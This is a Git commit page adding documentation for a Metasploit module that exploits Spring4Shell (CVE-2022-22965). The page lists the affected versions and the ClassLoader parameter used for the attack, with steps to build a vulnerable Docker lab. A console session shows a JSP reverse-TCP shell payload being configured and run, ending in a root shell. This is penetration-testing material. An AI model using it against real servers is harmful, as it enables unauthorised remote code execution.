adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Finish exploit CVE-2022-22965

Browse Source
This commit is contained in:
vleminator
2022-04-07 15:22:18 +02:00
parent 619661a845
commit 4e6176d9ca
2 changed files with 359 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/multi/http/spring_framework_rce_spring4shell.md
+73
View File
@@ -0,0 +1,73 @@
## Vulnerable Application
Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above
and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable
to remote code execution due to an unsafe data binding used to populate an object from request parameters
to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the
org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can
gain remote code execution.
## Verification Steps
1. Build the application
1. `git clone https://github.com/vleminator/Spring4Shell-POC`
2. `docker build . -t spring4shell`
2. Run the application
1. `docker run -p 8085:8080 spring4shell`
3. Start msfconsole
4. Run: `use exploit/multi/http/spring4shell`
5. Set the `RHOSTS`, `TARGET`, `PAYLOAD` and payload associated datastore options
6. Run the exploit
## Options
## Scenarios
### Spring Framework v5.3.15 on Linux (debian docker image)
```
msf6 exploit(multi/http/spring4shell) > show options
Module options (exploit/multi/http/spring4shell):
Name Current Setting Required Description
---- --------------- -------- -----------
FILEDROPPERDIR /tmp/ no The directory used for filedropper (only applicable to non-Java target)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 8085 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /helloworld/greeting yes The path to the application action
VHOST no HTTP server virtual host
Payload options (java/jsp_shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.0.174 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL no The system shell to use.
Exploit target:
Id Name
-- ----
0 Java
msf6 exploit(multi/http/spring4shell) > exploit
[*] Started reverse TCP handler on 192.168.0.174:4444
[*] 127.0.0.1:8085 - Generating JSP...
[*] 127.0.0.1:8085 - Modifying Class Loader...
[*] 127.0.0.1:8085 - Waiting for the server to flush the logfile
[+] 127.0.0.1:8085 - Log file flushed at http://127.0.0.1:8085/lKNWl49.jsp
[!] Tried to delete lKNWl49.jsp, unknown result
[*] Command shell session 2 opened (192.168.0.174:4444 -> 192.168.0.174:56430 ) at 2022-04-07 14:45:06 +0200
whoami
root
```